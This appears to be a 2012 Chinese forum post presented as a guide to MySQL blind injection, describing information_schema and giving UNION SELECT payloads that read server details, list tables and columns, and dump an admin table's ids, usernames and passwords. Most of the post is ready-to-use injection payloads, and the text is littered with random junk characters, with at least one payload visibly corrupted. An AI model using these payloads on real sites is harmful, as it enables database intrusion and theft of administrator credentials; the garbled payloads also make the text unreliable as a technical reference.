本文介绍MYSQL盲注的一些语句和方法
1 k& e+ h, `, I: t0 G
3 G. Q" j/ s" h9 h% F; E8 W学习盲注前先了解下 IFORMATION_SCHEMA 库
5 f3 J0 j" W" Q1 p: o6 o# d# O- e& [+ V# [9 I: m1 [' J; r
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有2 Z j' Z$ O; T8 ? ]
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。2 u! K8 `2 m4 Y: Z' r+ a! c
1.得到所有数据库名:
4 Y) P/ G: X$ b2 U9 x|SCHEMATA ->存储数据库名的表- a) @- D* q, ]+ j
|---字段:SCHEMA_NAME ->数据库名称, N5 P6 |, x2 s- Z$ x
& X9 i, f. H/ O: q9 X
|TABLES ->存储表名5 C; v- f+ Q/ d% a3 |! ]
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名 I/ d; K$ F, f2 z4 [ h6 d
|---字段:TABLE_NAME ->存储表的表名
9 ~- V. u/ g) R+ [+ U) c& X' O7 J6 b, m* e( k @& D% R; B( o. O
|COLUMNS ->存储的字段名表
9 t7 T- |* i" X|---字段:TABLE_SCHEMA ->该字段所属数据库名
% w% q. ]/ I4 B$ `: f|---字段:TABLE_NAME ->存储所属表的名称6 _1 l: x: K1 v4 `5 I, ^$ h" f
! a7 [. W$ @) W: B, m- i, y% e|---字段:COLUMN_NAME ->该字段的名称
6 a; O: Q, A' k4 D8 u, e2 k* I; s) I. z
) V# W6 K! Q7 z! _
+ u6 T: p3 O* _; J& i$ ^* p; X- Y# q4 m
% `8 B5 Z6 [, J e###########################################################################
8 b, }3 w8 B: ~; ~2 {# D7 g5 l3 K% ]. q b' C
0x001 获取系统信息:
( L) S/ B, L, r8 z, {- f7 \
2 ^& m. C8 Z0 B4 _6 k2 Wunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*& l j' z4 @# c/ K, E6 y
# J! N$ {- R' P$ _/ b/*
& @/ B5 |# E6 ~* R( Q* S" h3 }8 r4 p- K$ J7 K
@@global.version_compile_os 获取系统版本
c6 Z/ Q7 z8 C8 x. U+ j1 W* B3 `2 u6 y. x+ R- o3 H/ k
@@datadir 数据库路径
/ v' E% o: q8 \% `- u& \/ p: Pdatabase() 当前数据库名称
! D4 ?# o+ v! N9 x6 o v0x3c62723e 换行HEX值$ l4 R8 p% U( M' D( W; Z; G7 x) b
0 o" P3 C6 }0 M- y F6 Q5 u*/
, m3 v l4 V0 i, F! B; T b& r; \9 B% T* Q8 d9 {
" B2 r/ n. _( c( K+ m6 ^' ?: r6 u* h4 ?( V3 |' r4 @+ U
######################################################################& S m' S1 {3 J8 V6 y2 A0 s
1 |! O) l1 S/ w( m0 m
0x002 获取表名
1 j& Y" k1 [& r, F
+ l' ?3 w! y4 u7 Vunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*6 ^, j" n: J- o/ }3 y' q2 o
! e: O7 Z: U* ?" H* x- d3 R5 q5 o: U
. A* `0 L6 V4 c
2 L- c, w) d+ D3 y, x
/*
0 i4 q; \- @* \
2 P) K I# O/ @5 { b1 o. q0x67617264656e 为当前数据库名8 m4 Z& S8 N+ g
1 A8 J6 G$ Z8 G- o4 Qgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
' k: f1 t0 ? K5 W0 B" [
2 Y7 q3 h' w P5 d# S& \% Z*/+ M2 L- _" B. @/ S1 a6 |! Q
% m3 [$ d p" Q5 g' \! G
####################################################################### f1 C" ^$ O7 {' N+ y D8 u/ B
# V; E2 c" |+ G
3 J1 ?0 F. x, }7 F8 Z3 o
5 R, @8 b8 |, r8 t' Z6 b0x003 获取字段
( g/ s( z5 M( M) i8 [. p* _9 i1 w9 L$ w" ^! D, x' W7 m9 z S3 Z
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*8 Y5 r* V N0 ~" y" D
0 |, S' m- z" _) C6 Y5 k/ R
/*# w b( w4 @5 E: X# o
8 {) P& i+ j4 g
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
6 z+ {3 F( b% C6 U3 U8 H* s5 B& r, |( F H: G: i- z/ Z( D5 {
0x61646d696e ->选择一个表9 {4 ?5 n8 y2 z+ E2 ^( y
4 n: ^# y5 d3 C
0x67617264656e ->数据库名
( g+ e# i* l; I# F6 G0 Y' u* [+ W- f% C. \+ y
*/
* T, L! B7 ^# k2 f/ [4 G W% W% G0 M
#####################################################################" D& |7 }5 U4 ? C' H% p1 e
2 f% S4 `/ F% @4 \6 b& G0 f7 |% I$ x1 Q 9 W- E0 o; i9 m
+ Z$ `1 w0 J* O5 N0 L& u; B$ X6 D/ I
0x004 获取数据* j! \; Z/ F" h
- ]8 P0 f( V {! ~" f% e/ ]- K/ T
union select 1,2,37 [ T5 F; e0 ]9 @2 C* t1 m
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin" C5 J& r, _; W* X; j( V) C. U
D2 p# M' e* ]. |, junion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
5 S& T$ u2 z8 X' w' L- w7 v
( q9 u; E) [# a( O 9 D q* ^5 i m, _4 {1 a
- c9 q. y1 q$ ^/*, W. n* @! B7 H6 _. ?% M
' k' ?3 I) ~9 E+ o7 a$ t) M9 I0x3c62723e 换行符号HEX编码/ I/ M |4 |1 W, {- Z; v5 d
/ |) U) Q: ~* e6 P' Hgroup_concat 同时获得该字段所有数据% o! `- Y: J( w5 w: M4 z% \
f& q! I9 q0 X* K*/
$ v2 x% A! m; d6 P! `" t4 G
) k8 f6 Y$ N' Z. V, e1 {8 } |
发表于 2012-9-13 17:48:44
收藏
分享
支持
反对